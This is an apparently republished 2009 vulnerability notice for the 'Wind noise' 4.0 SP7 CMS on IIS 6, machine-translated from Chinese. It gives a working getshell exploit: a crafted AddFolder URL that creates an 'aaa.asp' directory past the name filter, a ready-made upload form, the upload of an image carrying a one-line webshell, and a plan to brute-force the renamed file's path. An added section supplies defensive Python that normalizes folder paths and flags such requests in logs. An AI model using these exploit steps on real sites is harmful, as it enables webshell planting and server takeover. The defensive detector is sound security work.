Wind noise 4.0 SP7 getshell 0day vulnerability warning - the black bar safety net

2009-07-13T00:00:00
ID MYHACK58:62200923850
Type myhack58
Reporter Anonymous
Modified 2009-07-13T00:00:00

Description

Source:<http://www.0kee.com/read.php?tid-1041.html>

Found by: bloodsword and bink. Reprints: please disregard. Affected versions: <= 4.0 SP7; earlier versions were not checked, but are estimated to be exploitable as well. Conditions of use: the file upload function is enabled, and the site runs under IIS 6.

Vulnerability description: create a directory somewhere whose name carries an executable extension. A mistake in the name filter lets the filter be bypassed, so a directory named "aaa.asp" can be created. First register an account, then access http://www.bbb.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/06150583700/aaa.asp//&CurrPath=/userfiles/06150583700 where 06150583700 is your user id, which can be seen directly after logging in. This creates the aaa.asp directory.

Because Wind noise applies its filter where directories are browsed, the subdirectory is created first and the file is uploaded into it. The form built locally is:

<form name="FileForm" method="post" enctype="multipart/form-data" action="http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp">
    <input type="hidden" name="AutoReName" value="2"><br>
    <input type="hidden" name="Path" value="/userfiles/06150583700/aaa.asp">
    <input type="file" size="20" name="File1">
    <input type="hidden" name="FilesNum" value="1">
    <input type="submit" id="BtnSubmit" name="Submit" value=" OK ">
    <input type="reset" id="ResetForm" name="Submit3" value=" refill ">
</form>

An image with a one-line shell embedded in it is then uploaded. The disgusting part: the uploaded file is renamed to Date + Time + a random number of up to 5 digits (it may be 4, 3, 2 or 1 digits, but at most 5). bink and I studied this for half a day and found no way to see the name -_-.

So, with limited means, we brute-force guess the upload path: first upload a file to a normal directory to measure the time difference between local and remote, then upload to the .asp directory, keep the error in seconds under 3 seconds, and start running. ~~ Then, with luck (RP), a few hours should be enough to get a result -_-
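For defenders, the two weak points above are the folder-name filter that let "aaa.asp//" through and the upload into that folder. The following is an added example (not code from Wind noise or from the authors) of a normalizing folder-name check and a detector that runs it over constructed, simplified IIS-style log lines; the set of script extensions assumes IIS 6 default script mappings, and the log format is assumed.

```python
import re
from urllib.parse import unquote

# Extensions that IIS 6 maps to asp.dll by default; a directory carrying one
# of them makes IIS execute every file stored inside it as ASP. Assumption:
# default script mappings, as on the page's IIS 6 environment.
SCRIPT_EXTENSIONS = {"asp", "asa", "cer", "cdx"}

def normalize_folder(path):
    """Decode a requested folder path and return its real components.

    URL encoding, backslashes, trailing/doubled slashes and surrounding spaces
    are removed first: the bypass on this page works because "aaa.asp//"
    slipped past a check that looked only at the raw string.
    """
    decoded = unquote(path).replace("\\", "/")
    return [seg.strip() for seg in decoded.split("/") if seg.strip() not in ("", ".")]

def folder_name_is_safe(path):
    """True only if no component could be treated as a script directory."""
    for component in normalize_folder(path):
        # Conservative: any dotted piece after the first that names a script
        # extension is rejected, so "x.asp.jpg" and "x.ASP" fail as well.
        pieces = component.lower().split(".")
        if any(piece in SCRIPT_EXTENSIONS for piece in pieces[1:]):
            return False
    return True

# Constructed, simplified IIS-style log lines (date time method uri-stem query status).
LOG_LINES = """\
2009-07-13 10:02:11 GET /User/CommPages/FolderImageList.asp f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/06150583700/aaa.asp//&CurrPath=/userfiles/06150583700 200
2009-07-13 10:02:40 POST /User/Commpages/UpFileSave.asp Path=/userfiles/06150583700/aaa.asp 200
2009-07-13 10:03:05 GET /User/CommPages/FolderImageList.asp f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/06150583700/photos&CurrPath=/userfiles/06150583700 200
""".splitlines()

PATH_PARAM = re.compile(r"(?:^|[?& ])Path=([^& ]+)")

def flag_suspicious_requests(lines):
    """Return (timestamp, path) for every request whose Path fails the check."""
    hits = []
    for line in lines:
        m = PATH_PARAM.search(line)
        if m and not folder_name_is_safe(m.group(1)):
            hits.append((line[:19], m.group(1)))
    return hits

if __name__ == "__main__":
    for when, path in flag_suspicious_requests(LOG_LINES):
        print(when, "rejected folder path:", path)
```

The same check belongs in the AddFolder handler itself, applied after decoding and normalization rather than to the raw Path string.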